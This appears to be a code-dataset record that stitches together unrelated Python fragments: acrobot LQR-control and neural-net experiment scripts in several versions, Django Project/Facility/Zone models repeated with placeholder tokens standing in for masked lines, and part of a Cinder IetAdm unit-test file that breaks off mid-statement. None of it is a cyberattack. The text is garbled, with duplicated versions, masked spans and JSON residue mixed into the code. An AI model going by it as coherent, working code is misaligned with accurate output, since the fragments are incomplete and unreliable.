plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1_vals, th2_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\nprint(end - start)\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\nx, y = np.meshgrid(th1dot_vals, th2dot_vals)\nz = preds\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n obs = env.reset()\n local_lqr = False\n actions = np.random.randn(1) * 3\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])\n )\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > 0.85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque\n )\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n return (local_action_hist, local_state_hist, local_reward_hist,\n local_gate_hist, local_lqr)\n\n\nconfig = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,\n 'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':\n l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':\n integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}\nenv = gym.make('su_acrobot-v0', **config)\nnum_trials = 1000\naction_hist = np.zeros((num_trials, env.num_steps, 1))\nstate_hist = np.zeros((num_trials, env.num_steps, env.observation_space.\n shape[0]))\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\ngate_hist = np.zeros((num_trials, env.num_steps, 1))\nerr_hist = np.zeros((num_trials, 1))\nlqr_list = []\nsuccess_list = []\nact_hold = 20\nhold_count = 0\nobs = env.reset()\nstart = time.time()\npool = Pool()\nfor i, res in enumerate(pool.imap(do_rollout, range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0, \n 0, 0])) ** 2))\n if lqr_on:\n lqr_list.append(i)\n if err_hist[i] < 2:\n success_list.append(i)\nprint(len(lqr_list))\nprint(len(success_list))\nprint((time.time() - global_start) / 60)\n",
"step-5": "# %%\nimport numpy as np\nfrom numpy import sin, cos, pi\nimport gym\nimport seagul.envs\n\nfrom seagul.integration import rk4,euler\nfrom control import lqr, ctrb\nfrom torch.multiprocessing import Pool\nimport matplotlib.pyplot as plt\nimport matplotlib\n\n#matplotlib.use('Qt5Agg')\n\nimport time\n\nglobal_start = time.time()\n\n# %%\nm1 = 1\nm2 = 1\nl1 = 1\nl2 = 2\nlc1 = .5\nlc2 = 1\nI1 = .083\nI2 = .33\ng = 9.8\n\n#\n# m1 = 1\n# m2 = 1\n# l1 = 1\n# l2 = 1\n# lc1 = .5\n# lc2 = .5\n# I1 = .2\n# I2 = 1.0\n# g = 9.8\n\n\ndt = .01\nmax_torque = 25\nintegrator = euler\n\nQ = np.identity(4)\nQ[0, 0] = 1\nQ[1, 1] = 1\nQ[2, 2] = 1\nQ[3, 3] = 1\n#\n# Q = np.array([[1000, -500, 0,0],[-500, 1000, 0, 0],[0, 0, 1000, -500],[0,0,-500,1000]])\nR = np.identity(2) * .01\n\neval_max_t = 10\n\n\nth1 = pi / 2\nth2 = 0\nth1d = 0\nth2d = 0\n\nTAU = np.array([[0], [1]])\n\nm11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)) + I1 + I2\nm22 = m2 * lc2 ** 2 + I2\nm12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2\nM = np.array([[m11, m12], [m12, m22]])\n\nh1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2) * th2d * th1d\nh2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2\nH = np.array([[h1], [h2]])\n\nphi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)\nphi2 = m2 * lc2 * g * cos(th1 + th2)\nPHI = np.array([[phi1], [phi2]])\n\nBl = np.linalg.inv(M) @ TAU\nBlin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])\n\nDPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-m2 * lc2 * g, -m2 * lc2 * g]])\nAl = -np.linalg.inv(M) @ DPHI\nAlin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [Al[1, 0], Al[1, 1], 0, 0]])\n\nCtr = ctrb(Alin, Blin)\nassert np.linalg.matrix_rank(Ctr) == 4\n\nK, S, E = lqr(Alin, Blin, Q, R)\nk = np.array(K[1, :])\nprint(k)\n\n\ndef control(q):\n gs = np.array([pi / 2, 0, 0, 0])\n return -k.dot(q - gs)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n done = reward < 2\n return reward, done\n\n\ndef do_rollout(args):\n x, trial_num = args\n th1, th2, dth1, dth2 = x\n np.random.seed(trial_num)\n local_reward_hist = np.ones((env.num_steps, 1)) * -1\n obs = env.reset(init_vec=[th1, th2, dth1, dth2])\n\n for i in range(env.num_steps):\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n obs, reward, done, _ = env.step(actions)\n local_reward_hist[i, :] = np.copy(reward)\n if done:\n break\n\n return local_reward_hist, i\n\n\n# %%b\nstart = time.time()\nconfig = {\"init_state\": [0, 0, 0, 0],\n \"max_torque\": max_torque,\n \"init_state_weights\": [0, 0, 0, 0],\n \"max_t\" : 2.5,\n \"dt\": dt,\n \"m2\": m2,\n \"m1\": m1,\n \"l1\": l1,\n \"lc1\": lc1,\n \"lc2\": lc2,\n \"i1\": I1,\n \"i2\": I2,\n \"integrator\" : integrator,\n \"reward_fn\": reward_fn,\n \"act_hold\": 1\n }\nenv = gym.make('su_acrobot-v0', **config)\n\nnum_trials = 200000\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\n\nX = np.zeros((num_trials, 4), dtype=np.float32)\nY = np.zeros((num_trials, 1), dtype=np.float32)\n\nth1_min = pi / 2 - .5\nth1_max = pi / 2 + .5\nth2_min = -1\nth2_max = 1\nth1dot_min = -5\nth1dot_max = 5\nth2dot_min = -10\nth2dot_max = 10\n\nsamples = np.random.random_sample((int(num_trials/2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\n\ntotal_steps = 0\npool = Pool() # defaults to number of available CPU's\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i, :] = samples[i, :]\n Y[i] = sum(rews) > env.num_steps*3 - 10\n\n\nth1_min = 0\nth1_max = 2*pi\nth2_min = -pi\nth2_max = pi\nth1dot_min = -10\nth1dot_max = 10\nth2dot_min = -30\nth2dot_max = 30\n\nsamples = np.random.random_sample((int(num_trials/2), 4))\nsamples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min - th1dot_max, th2dot_min - th2dot_max])\nsamples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])\ntotal_steps = 0\n\n\nfor i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(num_trials/2), int(num_trials))))):\n rews, steps = res\n reward_hist[i, :, :] = rews\n total_steps += steps\n X[i+int(num_trials/2), :] = samples[i, :]\n Y[i+int(num_trials/2)] = sum(rews) > env.num_steps*3 - 5\n\n\nprint(time.time() - start)\n\n# %%\nfrom seagul.nn import MLP, fit_model\nimport torch\n\nnet = MLP(4, 1, 2, 32) # output_activation=torch.nn.Softmax)\nY0 = np.ones((num_trials, 1), dtype=np.float32)\n\nw = 1e-2\nclass_weight = torch.tensor(Y.shape[0]/sum(Y)*w, dtype=torch.float32)\n\nloss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))\n#loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss())\n\n# loss_hist = fit_model(net, X, Y, 100, batch_size=2048)\n# loss_hist = fit_model(net, X, Y0, 5, batch_size=2048, loss_fn=torch.nn.BCEWithLogitsLoss(pos_weight=class_weight))\n\nplt.close()\nplt.plot(loss_hist)\nplt.show()\n\n# %%\n\n\nn_thdot = 1\nn_th = 1000\n\nth1_vals = np.linspace(0, 2*pi, n_th)\nth2_vals = np.linspace(-pi, pi, n_th)\n\nth1dot_vals = np.linspace(-10, 10, n_th)\nth2dot_vals = np.linspace(-30, 30, n_th)\n\nsig = torch.nn.Sigmoid()\n\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\n\nfrom itertools import product\n\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])\n\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\n\nend = time.time()\n\nprint(end - start)\n\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\n# generate 2 2d grids for the x & y bounds\nx, y = np.meshgrid(th1_vals, th2_vals)\nz = preds\n\n# x and y are bounds, so z should be the value *inside* those bounds.\n# Therefore, remove the last value from the z array.\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\n\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('Theta')\nax.set_xlabel('Th1')\nax.set_ylabel('Th2')\n\n# set the limits of the plot to the limits of the data\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\n\ncoords = np.zeros((n_th, n_th, 4), dtype=np.float32)\n\nstart = time.time()\nfor i, j in product(range(n_th), range(n_th)):\n coords[j, i, :] = np.array([pi/2, 0, th1dot_vals[i], th2dot_vals[j]])\n\npreds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())\nend = time.time()\n\nprint(end - start)\n\nfig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))\n# generate 2 2d grids for the x & y bounds\nx, y = np.meshgrid(th1dot_vals, th2dot_vals)\nz = preds\n\n# x and y are bounds, so z should be the value *inside* those bounds.\n# Therefore, remove the last value from the z array.\nz = z[:-1, :-1]\nz_min, z_max = 0, np.abs(z).max()\n\nc = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)\nax.set_title('DTheta')\nax.set_xlabel('dth1')\nax.set_ylabel('dth2')\n# set the limits of the plot to the limits of the data\nax.axis([x.min(), x.max(), y.min(), y.max()])\nfig.colorbar(c, ax=ax)\nplt.show()\n\n\n# %%\n\ntorch.set_default_dtype(torch.float32)\n\n\ndef reward_fn(s, a):\n reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])\n return reward, False\n\n\ndef do_rollout(trial_num):\n np.random.seed(trial_num)\n act_hold = 20\n hold_count = 0\n\n obs = env.reset()\n local_lqr = False\n\n actions = np.random.randn(1) * 3\n\n local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0]))\n local_reward_hist = np.zeros((env.num_steps, 1))\n local_gate_hist = np.zeros((env.num_steps, 1))\n local_action_hist = np.zeros((env.num_steps, 1))\n\n for i in range(env.num_steps):\n obs = np.array(obs, dtype=np.float32)\n if sig(net(obs)) > .85:\n actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)\n local_lqr = True\n local_gate_hist[i] = 1\n else:\n local_gate_hist[i] = 0\n if hold_count == act_hold:\n actions = np.random.randn(1) * 3\n hold_count = 0\n\n hold_count += 1\n obs, reward, done, _ = env.step(actions)\n local_action_hist[i, :] = np.copy(actions)\n local_state_hist[i, :] = np.copy(obs)\n local_reward_hist[i, :] = np.copy(reward)\n\n return local_action_hist, local_state_hist, local_reward_hist, local_gate_hist, local_lqr\n\n\nconfig = {\"init_state\": [-pi / 2, 0, 0, 0],\n \"max_torque\": max_torque,\n \"init_state_weights\": [1, 1, 5, 5],\n \"dt\": dt,\n \"m2\": m2,\n \"m1\": m1,\n \"l1\": l1,\n \"lc1\": lc1,\n \"lc2\": lc2,\n \"i1\": I1,\n \"i2\": I2,\n \"integrator\" : integrator,\n \"reward_fn\": reward_fn,\n \"act_hold\": 1,\n \"max_t\" : 10\n }\n\nenv = gym.make('su_acrobot-v0', **config)\n\nnum_trials = 1000\naction_hist = np.zeros((num_trials, env.num_steps, 1))\nstate_hist = np.zeros((num_trials, env.num_steps, env.observation_space.shape[0]))\nreward_hist = np.zeros((num_trials, env.num_steps, 1))\ngate_hist = np.zeros((num_trials, env.num_steps, 1))\nerr_hist = np.zeros((num_trials, 1))\n\nlqr_list = []\nsuccess_list = []\n\nact_hold = 20\nhold_count = 0\nobs = env.reset()\n\nstart = time.time()\n\npool = Pool() # defaults to number of available CPU's\nfor i, res in enumerate(pool.imap(do_rollout,range(num_trials))):\n acts, obs, rews, gate, lqr_on = res\n action_hist[i, :, :] = acts\n state_hist[i, :, :] = obs\n reward_hist[i, :, :] = rews\n gate_hist[i, :, :] = gate\n err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))\n if lqr_on:\n lqr_list.append(i)\n #print(err_hist[i])\n #print(reward_hist[i,-1])\n if err_hist[i] < 2:\n success_list.append(i)\n\n#\n# for i in (range(num_trials)):\n# res = do_rollout(i)\n# acts, obs, rews, gate, lqr_on = res\n# action_hist[i, :, :] = acts\n# state_hist[i, :, :] = obs\n# reward_hist[i, :, :] = rews\n# gate_hist[i, :, :] = gate\n# err_hist[i] = (np.sqrt(sum(((state_hist[i, -1, :] - np.array([pi / 2, 0, 0, 0])) ** 2))))\n# if lqr_on:\n# lqr_list.append(i)\n# #print(err_hist[i])\n# #print(reward_hist[i,-1])\n# if err_hist[i] < 2:\n# success_list.append(i)\n\n\nprint(len(lqr_list))\nprint(len(success_list))\n\nprint((time.time() - global_start) / 60)\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Project(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Project(models.Model):
project_id = models.IntegerField(primary_key=True)
project_name = models.CharField(max_length=50)
project_description = models.CharField(max_length=200, blank=True, null
=True)
project_address = models.CharField(max_length=100, blank=True, null=True)
project_city = models.CharField(max_length=50, blank=True, null=True)
project_pincode = models.CharField(max_length=10, blank=True, null=True)
project_status = models.CharField(max_length=10, blank=True, null=True)
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
from django.db import models
from django.db import models
class Project(models.Model):
project_id = models.IntegerField(primary_key=True)
project_name = models.CharField(max_length=50)
project_description = models.CharField(max_length=200, blank=True, null
=True)
project_address = models.CharField(max_length=100, blank=True, null=True)
project_city = models.CharField(max_length=50, blank=True, null=True)
project_pincode = models.CharField(max_length=10, blank=True, null=True)
project_status = models.CharField(max_length=10, blank=True, null=True)
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True,
null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
<|reserved_special_token_1|>
from django.db import models
# Create your models here.
from django.db import models
# Create your models here.
class Project(models.Model):
project_id = models.IntegerField(primary_key=True)
project_name = models.CharField(max_length=50)
project_description = models.CharField(max_length=200, blank=True, null=True)
project_address = models.CharField(max_length=100, blank=True, null=True)
project_city = models.CharField(max_length=50, blank=True, null=True)
project_pincode = models.CharField(max_length=10, blank=True, null=True)
project_status = models.CharField(max_length=10, blank=True, null=True)
class Meta:
db_table = 'project'
managed = True
class Facility(models.Model):
facility_id = models.IntegerField(primary_key=True)
facility_name = models.CharField(max_length=50)
facility_description = models.CharField(max_length=100, blank=True, null=True)
project = models.ForeignKey('Project', models.DO_NOTHING, null=True)
locked_for_edit = models.BooleanField(blank=True, null=True)
class Meta:
db_table = 'facility'
managed = True
class Zone(models.Model):
zone_id = models.AutoField(primary_key=True)
zone_name = models.CharField(max_length=20)
zone_description = models.CharField(max_length=100, blank=True, null=True)
facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)
class Meta:
db_table = 'zone'
managed = True
|
flexible
|
{
"blob_id": "2783fc24806c323ab4ac44fbac55eef73142ab80",
"index": 7710,
"step-1": "<mask token>\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-2": "<mask token>\n\n\nclass Project(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-3": "<mask token>\n\n\nclass Project(models.Model):\n project_id = models.IntegerField(primary_key=True)\n project_name = models.CharField(max_length=50)\n project_description = models.CharField(max_length=200, blank=True, null\n =True)\n project_address = models.CharField(max_length=100, blank=True, null=True)\n project_city = models.CharField(max_length=50, blank=True, null=True)\n project_pincode = models.CharField(max_length=10, blank=True, null=True)\n project_status = models.CharField(max_length=10, blank=True, null=True)\n\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-4": "from django.db import models\nfrom django.db import models\n\n\nclass Project(models.Model):\n project_id = models.IntegerField(primary_key=True)\n project_name = models.CharField(max_length=50)\n project_description = models.CharField(max_length=200, blank=True, null\n =True)\n project_address = models.CharField(max_length=100, blank=True, null=True)\n project_city = models.CharField(max_length=50, blank=True, null=True)\n project_pincode = models.CharField(max_length=10, blank=True, null=True)\n project_status = models.CharField(max_length=10, blank=True, null=True)\n\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True,\n null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-5": "from django.db import models\n\n# Create your models here.\nfrom django.db import models\n\n# Create your models here.\nclass Project(models.Model):\n project_id = models.IntegerField(primary_key=True)\n project_name = models.CharField(max_length=50)\n project_description = models.CharField(max_length=200, blank=True, null=True)\n project_address = models.CharField(max_length=100, blank=True, null=True)\n project_city = models.CharField(max_length=50, blank=True, null=True)\n project_pincode = models.CharField(max_length=10, blank=True, null=True)\n project_status = models.CharField(max_length=10, blank=True, null=True)\n\n class Meta:\n db_table = 'project'\n managed = True\n\n\n\nclass Facility(models.Model):\n facility_id = models.IntegerField(primary_key=True)\n facility_name = models.CharField(max_length=50)\n facility_description = models.CharField(max_length=100, blank=True, null=True)\n project = models.ForeignKey('Project', models.DO_NOTHING, null=True)\n locked_for_edit = models.BooleanField(blank=True, null=True)\n\n class Meta:\n db_table = 'facility'\n managed = True\n\n\n\nclass Zone(models.Model):\n zone_id = models.AutoField(primary_key=True)\n zone_name = models.CharField(max_length=20)\n zone_description = models.CharField(max_length=100, blank=True, null=True)\n facility = models.ForeignKey(Facility, models.DO_NOTHING, null=True)\n\n class Meta:\n db_table = 'zone'\n managed = True\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
<|reserved_special_token_0|>
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
<|reserved_special_token_0|>
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestIetAdmDriver(tf.TargetDriverFixture):
def setUp(self):
super(TestIetAdmDriver, self).setUp()
self.target = iet.IetAdm(root_helper=utils.get_root_helper(),
configuration=self.configuration)
def test_get_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual('1', self.target._get_target(
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
))
mock_open.side_effect = MemoryError()
self.assertRaises(MemoryError, self.target._get_target, '')
<|reserved_special_token_0|>
@mock.patch('cinder.utils.execute')
@mock.patch('os.path.exists', return_value=True)
def test_update_config_file_failure(self, mock_exists, mock_execute):
mock_exists.return_value = False
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetCreateFailed, self.target.
update_config_file, self.test_vol, 0, self.fake_volumes_dir,
'foo bar')
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._find_sid_cid_for_target',
return_value=None)
@mock.patch('os.path.exists', return_value=False)
@mock.patch('cinder.utils.execute')
def test_remove_iscsi_target(self, mock_execute, mock_exists, mock_find):
self.target.remove_iscsi_target(1, 0, self.testvol['id'], self.
testvol['name'])
mock_execute.assert_any_call('ietadm', '--op', 'delete', '--tid=1',
run_as_root=True)
mock_execute.side_effect = putils.ProcessExecutionError
self.assertRaises(exception.ISCSITargetRemoveFailed, self.target.
remove_iscsi_target, 1, 0, self.testvol['id'], self.testvol['name']
)
def test_find_sid_cid_for_target(self):
tmp_file = six.StringIO()
tmp_file.write(
"""tid:1 name:iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45
sid:844427031282176 initiator:iqn.1994-05.com.redhat:5a6894679665
cid:0 ip:10.9.8.7 state:active hd:none dd:none"""
)
tmp_file.seek(0)
with mock.patch('six.moves.builtins.open') as mock_open:
mock_open.return_value = contextlib.closing(tmp_file)
self.assertEqual(('844427031282176', '0'), self.target.
_find_sid_cid_for_target('1',
'iqn.2010-10.org.openstack:volume-83c2e877-feed-46be-8435-77884fe55b45'
, 'volume-83c2e877-feed-46be-8435-77884fe55b45'))
<|reserved_special_token_0|>
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target_chap_auth',
return_value=None)
@mock.patch('cinder.volume.targets.iet.IetAdm._get_target', return_value=1)
def test_ensure_export(self, mock_get_targetm, mock_get_chap):
ctxt = context.get_admin_context()
with mock.patch.object(self.target, 'create_iscsi_target'):
self.target.ensure_export(ctxt, self.testvol, self.fake_volumes_dir
)
self.target.create_iscsi_target.assert_called_once_with(
